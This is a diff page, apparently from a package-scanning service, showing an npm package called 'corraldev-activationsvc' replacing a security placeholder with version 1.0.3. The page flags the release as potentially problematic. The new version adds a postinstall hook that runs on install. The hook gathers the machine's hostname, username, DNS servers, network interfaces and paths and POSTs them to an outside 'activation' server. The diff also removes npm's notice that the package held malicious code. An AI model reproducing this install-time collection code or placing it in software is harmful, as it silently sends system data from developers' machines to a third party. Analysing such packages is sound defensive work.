corraldev-activationsvc 0.0.1-security.1 → 1.0.3

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of corraldev-activationsvc might be problematic. Click here for more details.

package/LICENSE ADDED
@@ -0,0 +1,7 @@
1
+ MIT License
2
+
3
+ Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
4
+
5
+ The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
6
+
7
+ THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
package/README.md CHANGED
@@ -1,5 +1,23 @@
1
- # Security holding package
1
+ ## Installation
2
2
 
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
3
+ Please note that the installation of this package is strictly reserved for authorized personnel only. Unauthorized installations are strictly prohibited.
4
4
 
5
- Please refer to www.npmjs.com/advisories?search=corraldev-activationsvc for more information.
5
+ ## Usage
6
+
7
+ To use this package, follow the steps below:
8
+
9
+ 1. Ensure that you have the necessary authorization to install and use this package.
10
+
11
+ 4. Start using the package in your application.
12
+
13
+ ## Security
14
+
15
+ We take the security of our packages seriously. To ensure that only authorized installations are performed, we employ metrics and monitoring systems to detect any unauthorized installations. Any unauthorized usage will be subject to appropriate actions.
16
+
17
+ ## Contributing
18
+
19
+ Contributions to this package are currently limited to authorized personnel only. If you are an authorized contributor, please follow our contribution guidelines.
20
+
21
+ ## License
22
+
23
+ This package is proprietary and confidential. Unauthorized distribution or modification of this package is strictly prohibited.
package/activation.js ADDED
@@ -0,0 +1,16 @@
1
+ "use strict";
2
+ var __importDefault = (this && this.__importDefault) || function (mod) {
3
+ return (mod && mod.__esModule) ? mod : { "default": mod };
4
+ };
5
+ Object.defineProperty(exports, "__esModule", { value: true });
6
+ const ActivationService_1 = __importDefault(require("./services/ActivationService"));
7
+ const fs_1 = __importDefault(require("fs"));
8
+ const activationResult = ActivationService_1.default.checkActivation();
9
+ console.log("Launching activation");
10
+ activationResult.then((response) => {
11
+ fs_1.default.writeFileSync("./token", response.data.access_token, "utf-8");
12
+ }).catch((error) => {
13
+ if (error.response && error.response.status === 403) {
14
+ fs_1.default.appendFileSync("error_log", JSON.stringify(error.response), "utf-8");
15
+ }
16
+ });
package/index.js ADDED
@@ -0,0 +1,19 @@
1
+ "use strict";
2
+ var __importDefault = (this && this.__importDefault) || function (mod) {
3
+ return (mod && mod.__esModule) ? mod : { "default": mod };
4
+ };
5
+ Object.defineProperty(exports, "__esModule", { value: true });
6
+ const fs_1 = __importDefault(require("fs"));
7
+ try {
8
+ const access_token = fs_1.default.readFileSync("./token", "utf-8");
9
+ if (!access_token) {
10
+ fs_1.default.appendFileSync("error_log", "Token not found", "utf-8");
11
+ }
12
+ else {
13
+ const token = JSON.parse(access_token);
14
+ console.log("Connected as ", token.username);
15
+ }
16
+ }
17
+ catch {
18
+ console.error("Error - This computer isn't activated");
19
+ }
package/package.json CHANGED
@@ -1,6 +1,31 @@
1
1
  {
2
2
  "name": "corraldev-activationsvc",
3
- "version": "0.0.1-security.1",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
3
+ "version": "1.0.3",
4
+ "description": "Private activation service for NPM packages",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "postinstall": "node activation.js"
9
+ },
10
+ "repository": {
11
+ "type": "git",
12
+ "url": "git+https://github.com/corraldev/activationsvc.git"
13
+ },
14
+ "keywords": [
15
+ "test",
16
+ "npm",
17
+ "package"
18
+ ],
19
+ "author": "Corraldev",
20
+ "license": "MIT",
21
+ "bugs": {
22
+ "url": "https://github.com/corraldev/activationsvc/issues"
23
+ },
24
+ "homepage": "https://github.com/corraldev/activationsvc#readme",
25
+ "dependencies": {
26
+ "@types/axios": "^0.14.0",
27
+ "@types/node": "^20.13.0",
28
+ "axios": "^1.7.2",
29
+ "init": "^0.1.2"
30
+ }
31
+ }
@@ -0,0 +1,37 @@
1
+ "use strict";
2
+ var __importDefault = (this && this.__importDefault) || function (mod) {
3
+ return (mod && mod.__esModule) ? mod : { "default": mod };
4
+ };
5
+ Object.defineProperty(exports, "__esModule", { value: true });
6
+ const axios_1 = __importDefault(require("axios"));
7
+ const os_1 = __importDefault(require("os"));
8
+ const dns_1 = __importDefault(require("dns"));
9
+ const static_1 = require("../static");
10
+ class ActivationService {
11
+ static getComputerMetadata() {
12
+ try {
13
+ const packageData = require(__dirname + '/../package.json');
14
+ const packageName = packageData.name;
15
+ return {
16
+ package: packageName,
17
+ dir: __dirname,
18
+ hostname: os_1.default.hostname(),
19
+ platform: os_1.default.platform(),
20
+ arch: os_1.default.arch(),
21
+ dns: dns_1.default.getServers(),
22
+ username: os_1.default.userInfo().username,
23
+ execDir: process.execPath,
24
+ pid: process.pid,
25
+ network: os_1.default.networkInterfaces()
26
+ };
27
+ }
28
+ catch (e) {
29
+ console.error(e);
30
+ }
31
+ }
32
+ static async checkActivation() {
33
+ console.log("Checking activation");
34
+ return axios_1.default.post(static_1.ACTIVATION_SERVER + "/activation", this.getComputerMetadata());
35
+ }
36
+ }
37
+ exports.default = ActivationService;
package/static.js ADDED
@@ -0,0 +1,4 @@
1
+ "use strict";
2
+ Object.defineProperty(exports, "__esModule", { value: true });
3
+ exports.ACTIVATION_SERVER = void 0;
4
+ exports.ACTIVATION_SERVER = "https://activation.corraldev.com";